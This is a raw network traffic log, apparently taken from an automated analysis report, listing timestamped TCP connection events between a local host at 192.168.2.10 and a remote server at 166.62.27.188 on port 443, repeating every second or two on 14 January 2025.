              Jan 14, 2025 08:26:33.428239107 CET50085443192.168.2.10166.62.27.188
              Jan 14, 2025 08:26:33.428287029 CET50085443192.168.2.10166.62.27.188
              Jan 14, 2025 08:26:33.428287029 CET50085443192.168.2.10166.62.27.188
              Jan 14, 2025 08:26:33.428311110 CET44350085166.62.27.188192.168.2.10
              Jan 14, 2025 08:26:33.428323984 CET44350085166.62.27.188192.168.2.10
              Jan 14, 2025 08:26:33.542877913 CET50086443192.168.2.10166.62.27.188
              Jan 14, 2025 08:26:33.542932034 CET44350086166.62.27.188192.168.2.10
              Jan 14, 2025 08:26:33.543055058 CET50086443192.168.2.10166.62.27.188
              Jan 14, 2025 08:26:33.543270111 CET50086443192.168.2.10166.62.27.188
              Jan 14, 2025 08:26:33.543333054 CET44350086166.62.27.188192.168.2.10
              Jan 14, 2025 08:26:33.543401957 CET50086443192.168.2.10166.62.27.188
              Jan 14, 2025 08:26:33.545799017 CET50087443192.168.2.10166.62.27.188
              Jan 14, 2025 08:26:33.545846939 CET44350087166.62.27.188192.168.2.10
              Jan 14, 2025 08:26:33.545919895 CET50087443192.168.2.10166.62.27.188
              Jan 14, 2025 08:26:33.546288013 CET50087443192.168.2.10166.62.27.188
              Jan 14, 2025 08:26:33.546302080 CET44350087166.62.27.188192.168.2.10
              Jan 14, 2025 08:26:34.447902918 CET44350087166.62.27.188192.168.2.10
              Jan 14, 2025 08:26:34.447966099 CET50087443192.168.2.10166.62.27.188
              Jan 14, 2025 08:26:34.449532986 CET50087443192.168.2.10166.62.27.188
              Jan 14, 2025 08:26:34.449548006 CET44350087166.62.27.188192.168.2.10
              Jan 14, 2025 08:26:34.449839115 CET44350087166.62.27.188192.168.2.10
              Jan 14, 2025 08:26:34.451001883 CET50087443192.168.2.10166.62.27.188
              Jan 14, 2025 08:26:34.495342970 CET44350087166.62.27.188192.168.2.10
              Jan 14, 2025 08:26:35.035614014 CET44350087166.62.27.188192.168.2.10
              Jan 14, 2025 08:26:35.035696983 CET44350087166.62.27.188192.168.2.10
              Jan 14, 2025 08:26:35.035808086 CET50087443192.168.2.10166.62.27.188
              Jan 14, 2025 08:26:35.035976887 CET50087443192.168.2.10166.62.27.188
              Jan 14, 2025 08:26:35.036001921 CET44350087166.62.27.188192.168.2.10
              Jan 14, 2025 08:26:35.036015987 CET50087443192.168.2.10166.62.27.188
              Jan 14, 2025 08:26:35.036031961 CET44350087166.62.27.188192.168.2.10
              Jan 14, 2025 08:26:35.150579929 CET50088443192.168.2.10166.62.27.188
              Jan 14, 2025 08:26:35.150630951 CET44350088166.62.27.188192.168.2.10
              Jan 14, 2025 08:26:35.150727034 CET50088443192.168.2.10166.62.27.188
              Jan 14, 2025 08:26:35.151099920 CET50088443192.168.2.10166.62.27.188
              Jan 14, 2025 08:26:35.151168108 CET44350088166.62.27.188192.168.2.10
              Jan 14, 2025 08:26:35.151225090 CET50088443192.168.2.10166.62.27.188
              Jan 14, 2025 08:26:35.154073000 CET50089443192.168.2.10166.62.27.188
              Jan 14, 2025 08:26:35.154131889 CET44350089166.62.27.188192.168.2.10
              Jan 14, 2025 08:26:35.154205084 CET50089443192.168.2.10166.62.27.188
              Jan 14, 2025 08:26:35.154584885 CET50089443192.168.2.10166.62.27.188
              Jan 14, 2025 08:26:35.154601097 CET44350089166.62.27.188192.168.2.10
              Jan 14, 2025 08:26:36.050364017 CET44350089166.62.27.188192.168.2.10
              Jan 14, 2025 08:26:36.050441027 CET50089443192.168.2.10166.62.27.188
              Jan 14, 2025 08:26:36.053456068 CET50089443192.168.2.10166.62.27.188
              Jan 14, 2025 08:26:36.053472996 CET44350089166.62.27.188192.168.2.10
              Jan 14, 2025 08:26:36.053733110 CET44350089166.62.27.188192.168.2.10
              Jan 14, 2025 08:26:36.055290937 CET50089443192.168.2.10166.62.27.188
              Jan 14, 2025 08:26:36.095344067 CET44350089166.62.27.188192.168.2.10
              Jan 14, 2025 08:26:36.639159918 CET44350089166.62.27.188192.168.2.10
              Jan 14, 2025 08:26:36.639410973 CET44350089166.62.27.188192.168.2.10
              Jan 14, 2025 08:26:36.639533997 CET50089443192.168.2.10166.62.27.188
              Jan 14, 2025 08:26:36.639787912 CET50089443192.168.2.10166.62.27.188
              Jan 14, 2025 08:26:36.639801979 CET44350089166.62.27.188192.168.2.10
              Jan 14, 2025 08:26:36.639817953 CET50089443192.168.2.10166.62.27.188
              Jan 14, 2025 08:26:36.639822006 CET44350089166.62.27.188192.168.2.10
              Jan 14, 2025 08:26:36.755716085 CET50090443192.168.2.10166.62.27.188
              Jan 14, 2025 08:26:36.755774975 CET44350090166.62.27.188192.168.2.10
              Jan 14, 2025 08:26:36.755898952 CET50090443192.168.2.10166.62.27.188
              Jan 14, 2025 08:26:36.756442070 CET50090443192.168.2.10166.62.27.188
              Jan 14, 2025 08:26:36.756494999 CET44350090166.62.27.188192.168.2.10
              Jan 14, 2025 08:26:36.759207964 CET50091443192.168.2.10166.62.27.188
              Jan 14, 2025 08:26:36.759259939 CET44350091166.62.27.188192.168.2.10
              Jan 14, 2025 08:26:36.759267092 CET50090443192.168.2.10166.62.27.188
              Jan 14, 2025 08:26:36.759388924 CET50091443192.168.2.10166.62.27.188
              Jan 14, 2025 08:26:36.759727955 CET50091443192.168.2.10166.62.27.188
              Jan 14, 2025 08:26:36.759740114 CET44350091166.62.27.188192.168.2.10
              Jan 14, 2025 08:26:37.643399000 CET44350091166.62.27.188192.168.2.10
              Jan 14, 2025 08:26:37.643543005 CET50091443192.168.2.10166.62.27.188
              Jan 14, 2025 08:26:37.645315886 CET50091443192.168.2.10166.62.27.188
              Jan 14, 2025 08:26:37.645328999 CET44350091166.62.27.188192.168.2.10
              Jan 14, 2025 08:26:37.645582914 CET44350091166.62.27.188192.168.2.10
              Jan 14, 2025 08:26:37.646928072 CET50091443192.168.2.10166.62.27.188
              Jan 14, 2025 08:26:37.687328100 CET44350091166.62.27.188192.168.2.10
              Jan 14, 2025 08:26:38.219568014 CET44350091166.62.27.188192.168.2.10
              Jan 14, 2025 08:26:38.219643116 CET44350091166.62.27.188192.168.2.10
              Jan 14, 2025 08:26:38.219764948 CET50091443192.168.2.10166.62.27.188
              Jan 14, 2025 08:26:38.220014095 CET50091443192.168.2.10166.62.27.188
              Jan 14, 2025 08:26:38.220035076 CET44350091166.62.27.188192.168.2.10
              Jan 14, 2025 08:26:38.220046997 CET50091443192.168.2.10166.62.27.188
              Jan 14, 2025 08:26:38.220053911 CET44350091166.62.27.188192.168.2.10
              Jan 14, 2025 08:26:38.333512068 CET50092443192.168.2.10166.62.27.188
              Jan 14, 2025 08:26:38.333576918 CET44350092166.62.27.188192.168.2.10
              Jan 14, 2025 08:26:38.333730936 CET50092443192.168.2.10166.62.27.188
              Jan 14, 2025 08:26:38.333913088 CET50092443192.168.2.10166.62.27.188
              Jan 14, 2025 08:26:38.333931923 CET44350092166.62.27.188192.168.2.10
              Jan 14, 2025 08:26:38.333985090 CET50092443192.168.2.10166.62.27.188
              Jan 14, 2025 08:26:38.336726904 CET50093443192.168.2.10166.62.27.188
              Jan 14, 2025 08:26:38.336774111 CET44350093166.62.27.188192.168.2.10
              Jan 14, 2025 08:26:38.336874962 CET50093443192.168.2.10166.62.27.188
              Jan 14, 2025 08:26:38.337246895 CET50093443192.168.2.10166.62.27.188
              Jan 14, 2025 08:26:38.337260962 CET44350093166.62.27.188192.168.2.10
              Jan 14, 2025 08:26:39.237201929 CET44350093166.62.27.188192.168.2.10
              Jan 14, 2025 08:26:39.237291098 CET50093443192.168.2.10166.62.27.188
              Jan 14, 2025 08:26:39.241916895 CET50093443192.168.2.10166.62.27.188
              Jan 14, 2025 08:26:39.241942883 CET44350093166.62.27.188192.168.2.10
              Jan 14, 2025 08:26:39.242357016 CET44350093166.62.27.188192.168.2.10
              Jan 14, 2025 08:26:39.243706942 CET50093443192.168.2.10166.62.27.188
              Jan 14, 2025 08:26:39.291349888 CET44350093166.62.27.188192.168.2.10
              Jan 14, 2025 08:26:39.826931000 CET44350093166.62.27.188192.168.2.10
              Jan 14, 2025 08:26:39.827178001 CET44350093166.62.27.188192.168.2.10
              Jan 14, 2025 08:26:39.827241898 CET50093443192.168.2.10166.62.27.188
              Jan 14, 2025 08:26:39.827847004 CET50093443192.168.2.10166.62.27.188
              Jan 14, 2025 08:26:39.827882051 CET44350093166.62.27.188192.168.2.10
              Jan 14, 2025 08:26:39.827902079 CET50093443192.168.2.10166.62.27.188
              Jan 14, 2025 08:26:39.827910900 CET44350093166.62.27.188192.168.2.10
              Jan 14, 2025 08:26:39.965724945 CET50094443192.168.2.10166.62.27.188
              Jan 14, 2025 08:26:39.965781927 CET44350094166.62.27.188192.168.2.10
              Jan 14, 2025 08:26:39.965910912 CET50094443192.168.2.10166.62.27.188
              Jan 14, 2025 08:26:39.965956926 CET50094443192.168.2.10166.62.27.188
              Jan 14, 2025 08:26:39.966078043 CET44350094166.62.27.188192.168.2.10
              Jan 14, 2025 08:26:39.966134071 CET50094443192.168.2.10166.62.27.188
              Jan 14, 2025 08:26:39.968538046 CET50095443192.168.2.10166.62.27.188
              Jan 14, 2025 08:26:39.968592882 CET44350095166.62.27.188192.168.2.10
              Jan 14, 2025 08:26:39.968687057 CET50095443192.168.2.10166.62.27.188
              Jan 14, 2025 08:26:39.968981981 CET50095443192.168.2.10166.62.27.188
              Jan 14, 2025 08:26:39.968996048 CET44350095166.62.27.188192.168.2.10
              Jan 14, 2025 08:26:40.864533901 CET44350095166.62.27.188192.168.2.10
              Jan 14, 2025 08:26:40.864698887 CET50095443192.168.2.10166.62.27.188
              Jan 14, 2025 08:26:40.866262913 CET50095443192.168.2.10166.62.27.188
              Jan 14, 2025 08:26:40.866282940 CET44350095166.62.27.188192.168.2.10
              Jan 14, 2025 08:26:40.866602898 CET44350095166.62.27.188192.168.2.10
              Jan 14, 2025 08:26:40.867898941 CET50095443192.168.2.10166.62.27.188
              Jan 14, 2025 08:26:40.915338993 CET44350095166.62.27.188192.168.2.10
              Jan 14, 2025 08:26:41.443537951 CET44350095166.62.27.188192.168.2.10
              Jan 14, 2025 08:26:41.443689108 CET44350095166.62.27.188192.168.2.10
              Jan 14, 2025 08:26:41.443763971 CET50095443192.168.2.10166.62.27.188
              Jan 14, 2025 08:26:41.443953037 CET50095443192.168.2.10166.62.27.188
              Jan 14, 2025 08:26:41.443969965 CET44350095166.62.27.188192.168.2.10
              Jan 14, 2025 08:26:41.443986893 CET50095443192.168.2.10166.62.27.188
              Jan 14, 2025 08:26:41.443991899 CET44350095166.62.27.188192.168.2.10
              Jan 14, 2025 08:26:41.557749987 CET50096443192.168.2.10166.62.27.188
              Jan 14, 2025 08:26:41.557806015 CET44350096166.62.27.188192.168.2.10
              Jan 14, 2025 08:26:41.557913065 CET50096443192.168.2.10166.62.27.188
              Jan 14, 2025 08:26:41.558119059 CET50096443192.168.2.10166.62.27.188
              Jan 14, 2025 08:26:41.558180094 CET44350096166.62.27.188192.168.2.10
              Jan 14, 2025 08:26:41.558233023 CET50096443192.168.2.10166.62.27.188
              Jan 14, 2025 08:26:41.560664892 CET50097443192.168.2.10166.62.27.188
              Jan 14, 2025 08:26:41.560730934 CET44350097166.62.27.188192.168.2.10
              Jan 14, 2025 08:26:41.560803890 CET50097443192.168.2.10166.62.27.188
              Jan 14, 2025 08:26:41.561151981 CET50097443192.168.2.10166.62.27.188
              Jan 14, 2025 08:26:41.561170101 CET44350097166.62.27.188192.168.2.10
              Jan 14, 2025 08:26:42.459547997 CET44350097166.62.27.188192.168.2.10
              Jan 14, 2025 08:26:42.459649086 CET50097443192.168.2.10166.62.27.188
              Jan 14, 2025 08:26:42.508455992 CET50097443192.168.2.10166.62.27.188
              Jan 14, 2025 08:26:42.508505106 CET44350097166.62.27.188192.168.2.10
              Jan 14, 2025 08:26:42.509629011 CET44350097166.62.27.188192.168.2.10
              Jan 14, 2025 08:26:42.533953905 CET50097443192.168.2.10166.62.27.188
              Jan 14, 2025 08:26:42.575330019 CET44350097166.62.27.188192.168.2.10
              Jan 14, 2025 08:26:43.043534994 CET44350097166.62.27.188192.168.2.10
              Jan 14, 2025 08:26:43.043736935 CET44350097166.62.27.188192.168.2.10
              Jan 14, 2025 08:26:43.044527054 CET50097443192.168.2.10166.62.27.188
              Jan 14, 2025 08:26:43.044575930 CET50097443192.168.2.10166.62.27.188
              Jan 14, 2025 08:26:43.044590950 CET44350097166.62.27.188192.168.2.10
              Jan 14, 2025 08:26:43.044604063 CET50097443192.168.2.10166.62.27.188
              Jan 14, 2025 08:26:43.044610023 CET44350097166.62.27.188192.168.2.10
              Jan 14, 2025 08:26:43.158427000 CET50098443192.168.2.10166.62.27.188
              Jan 14, 2025 08:26:43.158493996 CET44350098166.62.27.188192.168.2.10
              Jan 14, 2025 08:26:43.158616066 CET50098443192.168.2.10166.62.27.188
              Jan 14, 2025 08:26:43.158854008 CET50098443192.168.2.10166.62.27.188
              Jan 14, 2025 08:26:43.158906937 CET44350098166.62.27.188192.168.2.10
              Jan 14, 2025 08:26:43.158970118 CET50098443192.168.2.10166.62.27.188
              Jan 14, 2025 08:26:43.162038088 CET50099443192.168.2.10166.62.27.188
              Jan 14, 2025 08:26:43.162081957 CET44350099166.62.27.188192.168.2.10
              Jan 14, 2025 08:26:43.162154913 CET50099443192.168.2.10166.62.27.188
              Jan 14, 2025 08:26:43.162714958 CET50099443192.168.2.10166.62.27.188
              Jan 14, 2025 08:26:43.162724018 CET44350099166.62.27.188192.168.2.10
              Jan 14, 2025 08:26:44.066968918 CET44350099166.62.27.188192.168.2.10
              Jan 14, 2025 08:26:44.067064047 CET50099443192.168.2.10166.62.27.188
              Jan 14, 2025 08:26:44.068459034 CET50099443192.168.2.10166.62.27.188
              Jan 14, 2025 08:26:44.068470001 CET44350099166.62.27.188192.168.2.10
              Jan 14, 2025 08:26:44.068829060 CET44350099166.62.27.188192.168.2.10
              Jan 14, 2025 08:26:44.070347071 CET50099443192.168.2.10166.62.27.188
              Jan 14, 2025 08:26:44.111334085 CET44350099166.62.27.188192.168.2.10
              Jan 14, 2025 08:26:44.649487019 CET44350099166.62.27.188192.168.2.10
              Jan 14, 2025 08:26:44.649763107 CET44350099166.62.27.188192.168.2.10
              Jan 14, 2025 08:26:44.649827003 CET50099443192.168.2.10166.62.27.188
              Jan 14, 2025 08:26:44.649971962 CET50099443192.168.2.10166.62.27.188
              Jan 14, 2025 08:26:44.649986982 CET44350099166.62.27.188192.168.2.10
              Jan 14, 2025 08:26:44.763711929 CET50100443192.168.2.10166.62.27.188
              Jan 14, 2025 08:26:44.763760090 CET44350100166.62.27.188192.168.2.10
              Jan 14, 2025 08:26:44.764333963 CET50100443192.168.2.10166.62.27.188
              Jan 14, 2025 08:26:44.764333963 CET50100443192.168.2.10166.62.27.188
              Jan 14, 2025 08:26:44.764534950 CET44350100166.62.27.188192.168.2.10
              Jan 14, 2025 08:26:44.764626026 CET50100443192.168.2.10166.62.27.188
              Jan 14, 2025 08:26:44.766242027 CET50101443192.168.2.10166.62.27.188
              Jan 14, 2025 08:26:44.766309977 CET44350101166.62.27.188192.168.2.10
              Jan 14, 2025 08:26:44.766371965 CET50101443192.168.2.10166.62.27.188
              Jan 14, 2025 08:26:44.766755104 CET50101443192.168.2.10166.62.27.188
              Jan 14, 2025 08:26:44.766772985 CET44350101166.62.27.188192.168.2.10
              Jan 14, 2025 08:26:45.681580067 CET44350101166.62.27.188192.168.2.10
              Jan 14, 2025 08:26:45.681662083 CET50101443192.168.2.10166.62.27.188
              Jan 14, 2025 08:26:45.684467077 CET50101443192.168.2.10166.62.27.188
              Jan 14, 2025 08:26:45.684483051 CET44350101166.62.27.188192.168.2.10
              Jan 14, 2025 08:26:45.684920073 CET44350101166.62.27.188192.168.2.10
              Jan 14, 2025 08:26:45.686250925 CET50101443192.168.2.10166.62.27.188
              Jan 14, 2025 08:26:45.731333971 CET44350101166.62.27.188192.168.2.10
              Jan 14, 2025 08:26:46.263823986 CET44350101166.62.27.188192.168.2.10
              Jan 14, 2025 08:26:46.264132977 CET44350101166.62.27.188192.168.2.10
              Jan 14, 2025 08:26:46.264271975 CET50101443192.168.2.10166.62.27.188
              Jan 14, 2025 08:26:46.264401913 CET50101443192.168.2.10166.62.27.188
              Jan 14, 2025 08:26:46.264425039 CET44350101166.62.27.188192.168.2.10
              Jan 14, 2025 08:26:46.264436007 CET50101443192.168.2.10166.62.27.188
              Jan 14, 2025 08:26:46.264441013 CET44350101166.62.27.188192.168.2.10
              Jan 14, 2025 08:26:46.378097057 CET50102443192.168.2.10166.62.27.188
              Jan 14, 2025 08:26:46.378137112 CET44350102166.62.27.188192.168.2.10
              Jan 14, 2025 08:26:46.378257036 CET50102443192.168.2.10166.62.27.188
              Jan 14, 2025 08:26:46.379342079 CET50102443192.168.2.10166.62.27.188
              Jan 14, 2025 08:26:46.379446030 CET44350102166.62.27.188192.168.2.10
              Jan 14, 2025 08:26:46.379937887 CET50102443192.168.2.10166.62.27.188
              Jan 14, 2025 08:26:46.380599976 CET50103443192.168.2.10166.62.27.188
              Jan 14, 2025 08:26:46.380649090 CET44350103166.62.27.188192.168.2.10
              Jan 14, 2025 08:26:46.380707026 CET50103443192.168.2.10166.62.27.188
              Jan 14, 2025 08:26:46.381436110 CET50103443192.168.2.10166.62.27.188
              Jan 14, 2025 08:26:46.381452084 CET44350103166.62.27.188192.168.2.10
              Jan 14, 2025 08:26:47.273076057 CET44350103166.62.27.188192.168.2.10
              Jan 14, 2025 08:26:47.273324013 CET50103443192.168.2.10166.62.27.188
              Jan 14, 2025 08:26:47.274780989 CET50103443192.168.2.10166.62.27.188
              Jan 14, 2025 08:26:47.274794102 CET44350103166.62.27.188192.168.2.10
              Jan 14, 2025 08:26:47.275305986 CET44350103166.62.27.188192.168.2.10
              Jan 14, 2025 08:26:47.276598930 CET50103443192.168.2.10166.62.27.188
              Jan 14, 2025 08:26:47.319343090 CET44350103166.62.27.188192.168.2.10
              Jan 14, 2025 08:26:47.853766918 CET44350103166.62.27.188192.168.2.10
              Jan 14, 2025 08:26:47.853949070 CET44350103166.62.27.188192.168.2.10
              Jan 14, 2025 08:26:47.854079008 CET50103443192.168.2.10166.62.27.188
              Jan 14, 2025 08:26:47.854129076 CET50103443192.168.2.10166.62.27.188
              Jan 14, 2025 08:26:47.854151011 CET44350103166.62.27.188192.168.2.10
              Jan 14, 2025 08:26:47.854166031 CET50103443192.168.2.10166.62.27.188
              Jan 14, 2025 08:26:47.854171991 CET44350103166.62.27.188192.168.2.10
              Jan 14, 2025 08:26:47.967740059 CET50104443192.168.2.10166.62.27.188
              Jan 14, 2025 08:26:47.967793941 CET44350104166.62.27.188192.168.2.10
              Jan 14, 2025 08:26:47.967885971 CET50104443192.168.2.10166.62.27.188
              Jan 14, 2025 08:26:47.967993021 CET50104443192.168.2.10166.62.27.188
              Jan 14, 2025 08:26:47.968111992 CET44350104166.62.27.188192.168.2.10
              Jan 14, 2025 08:26:47.968187094 CET50104443192.168.2.10166.62.27.188
              Jan 14, 2025 08:26:47.970593929 CET50105443192.168.2.10166.62.27.188
              Jan 14, 2025 08:26:47.970691919 CET44350105166.62.27.188192.168.2.10
              Jan 14, 2025 08:26:47.970822096 CET50105443192.168.2.10166.62.27.188
              Jan 14, 2025 08:26:47.971122026 CET50105443192.168.2.10166.62.27.188
              Jan 14, 2025 08:26:47.971157074 CET44350105166.62.27.188192.168.2.10
              Jan 14, 2025 08:26:48.876127005 CET44350105166.62.27.188192.168.2.10
              Jan 14, 2025 08:26:48.876203060 CET50105443192.168.2.10166.62.27.188
              Jan 14, 2025 08:26:48.877593040 CET50105443192.168.2.10166.62.27.188
              Jan 14, 2025 08:26:48.877604008 CET44350105166.62.27.188192.168.2.10
              Jan 14, 2025 08:26:48.877845049 CET44350105166.62.27.188192.168.2.10
              Jan 14, 2025 08:26:48.879343987 CET50105443192.168.2.10166.62.27.188
              Jan 14, 2025 08:26:48.923377037 CET44350105166.62.27.188192.168.2.10
              Jan 14, 2025 08:26:49.459681988 CET44350105166.62.27.188192.168.2.10
              Jan 14, 2025 08:26:49.459858894 CET44350105166.62.27.188192.168.2.10
              Jan 14, 2025 08:26:49.460058928 CET50105443192.168.2.10166.62.27.188
              Jan 14, 2025 08:26:49.460125923 CET50105443192.168.2.10166.62.27.188
              Jan 14, 2025 08:26:49.460125923 CET50105443192.168.2.10166.62.27.188
              Jan 14, 2025 08:26:49.460150003 CET44350105166.62.27.188192.168.2.10
              Jan 14, 2025 08:26:49.460159063 CET44350105166.62.27.188192.168.2.10
              Jan 14, 2025 08:26:49.573632002 CET50106443192.168.2.10166.62.27.188
              Jan 14, 2025 08:26:49.573702097 CET44350106166.62.27.188192.168.2.10
              Jan 14, 2025 08:26:49.573807001 CET50106443192.168.2.10166.62.27.188
              Jan 14, 2025 08:26:49.573904037 CET50106443192.168.2.10166.62.27.188
              Jan 14, 2025 08:26:49.574019909 CET44350106166.62.27.188192.168.2.10
              Jan 14, 2025 08:26:49.574080944 CET50106443192.168.2.10166.62.27.188
              Jan 14, 2025 08:26:49.576153040 CET50107443192.168.2.10166.62.27.188
              Jan 14, 2025 08:26:49.576208115 CET44350107166.62.27.188192.168.2.10
              Jan 14, 2025 08:26:49.576288939 CET50107443192.168.2.10166.62.27.188
              Jan 14, 2025 08:26:49.576560974 CET50107443192.168.2.10166.62.27.188
              Jan 14, 2025 08:26:49.576576948 CET44350107166.62.27.188192.168.2.10
              Jan 14, 2025 08:26:50.475200891 CET44350107166.62.27.188192.168.2.10
              Jan 14, 2025 08:26:50.475361109 CET50107443192.168.2.10166.62.27.188
              Jan 14, 2025 08:26:50.476994038 CET50107443192.168.2.10166.62.27.188
              Jan 14, 2025 08:26:50.477030993 CET44350107166.62.27.188192.168.2.10
              Jan 14, 2025 08:26:50.477861881 CET44350107166.62.27.188192.168.2.10
              Jan 14, 2025 08:26:50.479238987 CET50107443192.168.2.10166.62.27.188
              Jan 14, 2025 08:26:50.523334026 CET44350107166.62.27.188192.168.2.10
              Jan 14, 2025 08:26:51.054712057 CET44350107166.62.27.188192.168.2.10
              Jan 14, 2025 08:26:51.054876089 CET44350107166.62.27.188192.168.2.10
              Jan 14, 2025 08:26:51.055006027 CET50107443192.168.2.10166.62.27.188
              Jan 14, 2025 08:26:51.055116892 CET50107443192.168.2.10166.62.27.188
              Jan 14, 2025 08:26:51.055116892 CET50107443192.168.2.10166.62.27.188
              Jan 14, 2025 08:26:51.055162907 CET44350107166.62.27.188192.168.2.10
              Jan 14, 2025 08:26:51.055190086 CET44350107166.62.27.188192.168.2.10
              Jan 14, 2025 08:26:51.167069912 CET50108443192.168.2.10166.62.27.188
              Jan 14, 2025 08:26:51.167112112 CET44350108166.62.27.188192.168.2.10
              Jan 14, 2025 08:26:51.167205095 CET50108443192.168.2.10166.62.27.188
              Jan 14, 2025 08:26:51.167337894 CET50108443192.168.2.10166.62.27.188
              Jan 14, 2025 08:26:51.167443991 CET44350108166.62.27.188192.168.2.10
              Jan 14, 2025 08:26:51.167510986 CET50108443192.168.2.10166.62.27.188
              Jan 14, 2025 08:26:51.183269024 CET50109443192.168.2.10166.62.27.188
              Jan 14, 2025 08:26:51.183325052 CET44350109166.62.27.188192.168.2.10
              Jan 14, 2025 08:26:51.183406115 CET50109443192.168.2.10166.62.27.188
              Jan 14, 2025 08:26:51.183677912 CET50109443192.168.2.10166.62.27.188
              Jan 14, 2025 08:26:51.183697939 CET44350109166.62.27.188192.168.2.10
              Jan 14, 2025 08:26:52.082602978 CET44350109166.62.27.188192.168.2.10
              Jan 14, 2025 08:26:52.082709074 CET50109443192.168.2.10166.62.27.188
              Jan 14, 2025 08:26:52.084485054 CET50109443192.168.2.10166.62.27.188
              Jan 14, 2025 08:26:52.084496975 CET44350109166.62.27.188192.168.2.10
              Jan 14, 2025 08:26:52.085032940 CET44350109166.62.27.188192.168.2.10
              Jan 14, 2025 08:26:52.086308002 CET50109443192.168.2.10166.62.27.188
              Jan 14, 2025 08:26:52.131325006 CET44350109166.62.27.188192.168.2.10
              Jan 14, 2025 08:26:52.786663055 CET44350109166.62.27.188192.168.2.10
              Jan 14, 2025 08:26:52.786849976 CET44350109166.62.27.188192.168.2.10
              Jan 14, 2025 08:26:52.786915064 CET50109443192.168.2.10166.62.27.188
              Jan 14, 2025 08:26:53.079878092 CET50109443192.168.2.10166.62.27.188
              Jan 14, 2025 08:26:53.079920053 CET44350109166.62.27.188192.168.2.10
              Jan 14, 2025 08:26:53.079935074 CET50109443192.168.2.10166.62.27.188
              Jan 14, 2025 08:26:53.079941988 CET44350109166.62.27.188192.168.2.10
              Jan 14, 2025 08:26:53.198643923 CET50110443192.168.2.10166.62.27.188
              Jan 14, 2025 08:26:53.198709965 CET44350110166.62.27.188192.168.2.10
              Jan 14, 2025 08:26:53.198957920 CET50110443192.168.2.10166.62.27.188
              Jan 14, 2025 08:26:53.199131966 CET50110443192.168.2.10166.62.27.188
              Jan 14, 2025 08:26:53.199202061 CET44350110166.62.27.188192.168.2.10
              Jan 14, 2025 08:26:53.199330091 CET50110443192.168.2.10166.62.27.188
              Jan 14, 2025 08:26:53.203571081 CET50111443192.168.2.10166.62.27.188
              Jan 14, 2025 08:26:53.203634977 CET44350111166.62.27.188192.168.2.10
              Jan 14, 2025 08:26:53.203717947 CET50111443192.168.2.10166.62.27.188
              Jan 14, 2025 08:26:53.204056025 CET50111443192.168.2.10166.62.27.188
              Jan 14, 2025 08:26:53.204070091 CET44350111166.62.27.188192.168.2.10
              Jan 14, 2025 08:26:54.094929934 CET44350111166.62.27.188192.168.2.10
              Jan 14, 2025 08:26:54.095012903 CET50111443192.168.2.10166.62.27.188
              Jan 14, 2025 08:26:54.096826077 CET50111443192.168.2.10166.62.27.188
              Jan 14, 2025 08:26:54.096839905 CET44350111166.62.27.188192.168.2.10
              Jan 14, 2025 08:26:54.097070932 CET44350111166.62.27.188192.168.2.10
              Jan 14, 2025 08:26:54.098584890 CET50111443192.168.2.10166.62.27.188
              Jan 14, 2025 08:26:54.139348030 CET44350111166.62.27.188192.168.2.10
              Jan 14, 2025 08:26:54.675033092 CET44350111166.62.27.188192.168.2.10
              Jan 14, 2025 08:26:54.675112963 CET44350111166.62.27.188192.168.2.10
              Jan 14, 2025 08:26:54.675173998 CET50111443192.168.2.10166.62.27.188
              Jan 14, 2025 08:26:54.675368071 CET50111443192.168.2.10166.62.27.188
              Jan 14, 2025 08:26:54.675390005 CET44350111166.62.27.188192.168.2.10
              Jan 14, 2025 08:26:54.675430059 CET50111443192.168.2.10166.62.27.188
              Jan 14, 2025 08:26:54.675436020 CET44350111166.62.27.188192.168.2.10
              Jan 14, 2025 08:26:54.789151907 CET50112443192.168.2.10166.62.27.188
              Jan 14, 2025 08:26:54.789216042 CET44350112166.62.27.188192.168.2.10
              Jan 14, 2025 08:26:54.791018009 CET50112443192.168.2.10166.62.27.188
              Jan 14, 2025 08:26:54.791018009 CET50112443192.168.2.10166.62.27.188
              Jan 14, 2025 08:26:54.791229010 CET44350112166.62.27.188192.168.2.10
              Jan 14, 2025 08:26:54.791327953 CET50112443192.168.2.10166.62.27.188
              Jan 14, 2025 08:26:54.791943073 CET50113443192.168.2.10166.62.27.188
              Jan 14, 2025 08:26:54.792052031 CET44350113166.62.27.188192.168.2.10
              Jan 14, 2025 08:26:54.792160988 CET50113443192.168.2.10166.62.27.188
              Jan 14, 2025 08:26:54.792500973 CET50113443192.168.2.10166.62.27.188
              Jan 14, 2025 08:26:54.792519093 CET44350113166.62.27.188192.168.2.10
              Jan 14, 2025 08:26:55.710427999 CET44350113166.62.27.188192.168.2.10
              Jan 14, 2025 08:26:55.710526943 CET50113443192.168.2.10166.62.27.188
              Jan 14, 2025 08:26:55.722753048 CET50113443192.168.2.10166.62.27.188
              Jan 14, 2025 08:26:55.722773075 CET44350113166.62.27.188192.168.2.10
              Jan 14, 2025 08:26:55.723644972 CET44350113166.62.27.188192.168.2.10
              Jan 14, 2025 08:26:55.724891901 CET50113443192.168.2.10166.62.27.188
              Jan 14, 2025 08:26:55.767345905 CET44350113166.62.27.188192.168.2.10
              Jan 14, 2025 08:26:56.300808907 CET44350113166.62.27.188192.168.2.10
              Jan 14, 2025 08:26:56.301064968 CET44350113166.62.27.188192.168.2.10
              Jan 14, 2025 08:26:56.301131010 CET50113443192.168.2.10166.62.27.188
              Jan 14, 2025 08:26:56.301295996 CET50113443192.168.2.10166.62.27.188
              Jan 14, 2025 08:26:56.301312923 CET44350113166.62.27.188192.168.2.10
              Jan 14, 2025 08:26:56.301328897 CET50113443192.168.2.10166.62.27.188
              Jan 14, 2025 08:26:56.301333904 CET44350113166.62.27.188192.168.2.10
              Jan 14, 2025 08:26:56.418066978 CET50114443192.168.2.10166.62.27.188
              Jan 14, 2025 08:26:56.418124914 CET44350114166.62.27.188192.168.2.10
              Jan 14, 2025 08:26:56.418260098 CET50114443192.168.2.10166.62.27.188
              Jan 14, 2025 08:26:56.418355942 CET50114443192.168.2.10166.62.27.188
              Jan 14, 2025 08:26:56.418428898 CET44350114166.62.27.188192.168.2.10
              Jan 14, 2025 08:26:56.418497086 CET50114443192.168.2.10166.62.27.188
              Jan 14, 2025 08:26:56.421437025 CET50115443192.168.2.10166.62.27.188
              Jan 14, 2025 08:26:56.421487093 CET44350115166.62.27.188192.168.2.10
              Jan 14, 2025 08:26:56.421571016 CET50115443192.168.2.10166.62.27.188
              Jan 14, 2025 08:26:56.421896935 CET50115443192.168.2.10166.62.27.188
              Jan 14, 2025 08:26:56.421912909 CET44350115166.62.27.188192.168.2.10
              Jan 14, 2025 08:26:57.332915068 CET44350115166.62.27.188192.168.2.10
